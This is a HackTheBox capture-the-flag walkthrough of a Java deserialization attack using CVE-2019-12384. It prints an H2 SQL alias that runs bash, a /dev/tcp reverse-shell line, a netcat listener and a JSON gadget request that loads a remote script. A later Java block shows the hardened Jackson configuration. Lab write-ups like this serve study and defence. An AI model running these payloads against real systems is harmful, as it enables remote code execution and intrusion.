Hackthebox Notes Java Deserialization Part 2
Last night, I left off at…
not sure if any specific CVE found has a specific exploit or PoC for this box, or if I'll have to research and roll my own
appears that Java Deserialization is the hot topic and I am unsure if this is like SQLi where I just need to know how it works and experiment with it
been reading for an hour about java deserialization to get a basic understanding of it
found resource https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
pause for the night to spend time with wife
This morning, I made my wife and myself some coffee, the kids are out of the house, and I launched back into the machine with a few hours still remaining.
reading through OWASP guide, found a deserialization cheat sheet and mention of Burp Suite deserialization plugin
loaded Burp, went to BApp, found Java Deserialization extension, requires Burp Suite Pro, scratch that
sent request through proxy...nothing unusual
reading more about deserialization
found CVE-2019-12384 exploit on github, reviewing code
looks like I can modify the exploit and go from there
cloning exploit repository...done
reviewing code...
contains inject.sql with a payload inside:
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('id > exploited.txt')
so I modified last line from:
CALL SHELLEXEC('id > exploited.txt')
to:
CALL SHELLEXEC('setsid bash -i &>/dev/tcp/IP/PORT 0>&1 &')
in order to catch a shell in netcat.
so now according to the exploit, I spawn an HTTP server to host the exploit
python2 -m SimpleHTTPServer
created a netcat listener
nc -nlvp 4444
pasted the following into http input form:
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://IP:PORT/inject.sql'"}]
Immediately got a shell!
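To show the application-side root cause of the chain above, the following is an added example in Java, not code from the post or the box: it assumes Jackson 2.10 or newer and an application package named com.example.model, and contrasts the global default-typing setup that lets a request body name any class on the classpath with an allow-listed PolymorphicTypeValidator that rejects the logback type id before anything is instantiated.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class PolymorphicTypingDemo {

    // The request body from the write-up, IP/PORT placeholders kept as they appear there.
    static final String PAYLOAD =
        "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\","
      + "{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;"
      + "INIT=RUNSCRIPT FROM 'http://IP:PORT/inject.sql'\"}]";

    // Vulnerable pattern: global default typing means the first array element is read
    // as a class name and Jackson instantiates it, so the JSON chooses the gadget.
    static ObjectMapper unsafeMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(); // deprecated since 2.10 for exactly this reason
        return m;
    }

    // Hardened pattern: polymorphic type ids are honoured only under an allow-listed
    // package (assumed name), so a logback or H2 class name in the body is refused.
    static ObjectMapper safeMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType("com.example.model.")
            .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    public static void main(String[] args) throws Exception {
        try {
            safeMapper().readValue(PAYLOAD, Object.class);
            System.out.println("unexpected: type id accepted");
        } catch (InvalidTypeIdException e) {
            // Thrown whether or not logback is on the classpath: the validator never
            // lets the name resolve to a constructor call.
            System.out.println("rejected type id: " + e.getTypeId());
        }
        // unsafeMapper().readValue(PAYLOAD, Object.class) would instead build the
        // logback connection source and hand the JDBC URL to H2, which is the chain
        // the write-up used; it is deliberately not invoked here.
    }
}
```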
whoami = pericles
ps aux = crontab, apache servers, and more
pulled user flag real quick and submitted
googling for manual enumeration cheat sheets
heading out to a meeting, killed shell and HTB VPN
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!